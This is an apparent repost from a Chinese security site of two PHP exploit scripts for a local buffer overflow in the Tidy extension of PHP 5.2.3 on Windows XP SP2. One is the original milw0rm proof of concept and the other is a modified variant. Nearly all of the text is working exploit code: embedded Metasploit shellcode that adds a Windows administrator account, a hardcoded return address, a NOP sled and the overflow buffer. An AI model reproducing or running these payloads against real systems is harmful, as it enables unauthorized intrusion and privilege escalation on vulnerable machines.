PHP 5.2.3 Tidy extension Local Buffer Overflow Exp 's

admin, 2017-05-08 23:00:57
Summary

Note from 鬼仔: there are two versions. One is the version posted on milw0rm; the other is 茄子宝's modification of that milw0rm version. 茄子宝 says it was tested successfully on Chinese-language XP SP2 + PHP 5.2.3 and adds an administrator account with username and password rayh4c.

The milw0rm version:

<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

# win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
$scode =
"/xfc/xbb/x0b/xad/x7d/x9a/xeb/x0c/x5e/x56/x31/x1e/xad/x01/xc3/x85".
"/xc0/x75/xf7/xc3/xe8/xef/xff/xff/xff/xf7/x45/x39/x9a/x07/x96/x49".
"/xdf/x3b/x1d/x31/xe5/x3b/x20/x25/x6e/xf4/x3a/x32/x2e/x2a/x3a/xaf".
"/x98/xa1/x08/xa4/x1a/x5b/x41/x7a/x85/x0f/x26/xba/xc2/x48/xe6/xf1".
"/x26/x57/x2a/xee/xcd/x6c/xfe/xd5/x29/xe7/x1b/x9e/x6d/x23/xe5/x4a".
"/xf7/xa0/xe9/xc7/x73/xe9/xed/xd6/x68/x9e/x12/x52/x6f/x4b/xa3/x38".
"/x54/x8f/x77/xf1/x54/xeb/xfc/xb2/x64/x76/xc2/x4b/x89/xf3/x83/xa7".
"/x1a/x73/x18/x15/x97/x1b/x28/x8e/xa1/x50/xa8/xe0/xb2/x66/xa9/x8b".
"/xdb/x5a/xf6/xba/xed/xc2/x5e/x34/xe9/x81/x9f/x3d/x5a/xed/xf0/x0c".
"/xba/x8d/x66/x09/xc5/xc7/x79/x7e/xc5/x30/xe6/xed/x5d/x90/x8c/x95".
"/xf8/xcc/x61/x05/x23/x62/x1b/xbd/x03/x0f/x90/x58/x36/xcf/x25/xd6".
"/xd8/x2f/xbe/x62/x50/x0f/x11/xd2/xde/x0b/x4d/xf2/xf8/xb3/xe3/x9f".
"/x70/x93/x97/x30/x1a/xb2/x0b/xa8/xae/x5b/xa1/x46/x6f/xe2/x2d/xca".
"/x06/x8a/xc4/x67/xad/x20/x76/xfc/x22/xb6/x0b/xdc/xcf/x43/x82/x3c".
"/x1f/xea/x1e/x79/x5f/xec/x9e/x81/x5f";

$EIP="/x8B/x51/x81/x7C"; //0x7C81518B call esp kernel32.dll
$NOP=str_repeat("/x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

The version modified by 茄子宝:

<?php

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

$scode =
"/xfc/xbb/xc7/xc4/x05/xc9/xeb/x0c/x5e/x56/x31/x1e/xad/x01/xc3/x85".
"/xc0/x75/xf7/xc3/xe8/xef/xff/xff/xff/x3b/x2c/x41/xc9/xc3/xad/xc1".
"/x8c/xff/x26/xa9/x0b/x87/x39/xbd/x9f/x38/x22/xca/xff/xe6/x53/x27".
"/xb6/x6d/x67/x3c/x48/x9f/xb9/x82/xd2/xf3/x3e/xc2/x91/x0c/xfe/x09".
"/x54/x13/xc2/x65/x93/x28/x96/x5d/x58/x3b/xf3/x15/x3f/xe7/xfa/xc2".
"/xa6/x6c/xf0/x5f/xac/x2d/x15/x61/x59/x5a/x39/xea/x9c/xb7/xcb/xb0".
"/xba/x43/x0f/x79/x03/x2f/x04/x3a/xb3/x2a/xda/xc3/xbf/xbf/x9b/x3f".
"/x4b/xcf/x07/xed/xc0/x47/x30/x06/xdf/x1c/xc0/x68/xe0/x22/xc1/x03".
"/x89/x1e/x9e/x22/xbc/x3e/x76/xcc/xb8/x3d/xb6/xb5/x68/x29/xc7/xc0".
"/x8d/xf6/x4f/x4d/x73/x82/x9e/x3a/x73/x75/xfd/xa9/xef/x57/x67/x4a".
"/x95/x87/x48/xc9/x75/xa9/xf3/x79/x56/x40/x8f/xe4/xe4/x8a/x1d/x86".
"/x71/xa2/xd5/x2b/xa2/x40/x77/xd5/xca/x90/x14/x05/x24/x99/x9e/x01".
"/x1a/x3f/x39/xaa/x34/x5a/x31/x8a/xa4/xcb/xda/xab/x58/x74/x6f/x43".
"/xd4/x0a/xaf/xda/x72/x87/xc6/xb2/x13/x24/x6d/x39/x85/xbe/xe2/xcf".
"/x36/x1e/x8f/x4e/xc0/x36/x5b/xf2/x12/xe9/xe2/xb0/x16/xf5/xe4/x38".
"/x97/xf5/xe4/x38/x97";

$EIP="/xD8/x69/x83/x7C";
$NOP=str_repeat("/x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

Published 2017-05-08 23:00:57. Please keep the original link when reposting (CN-SEC 中文网, with thanks to the original author): http://cn-sec.com/archives/49937.html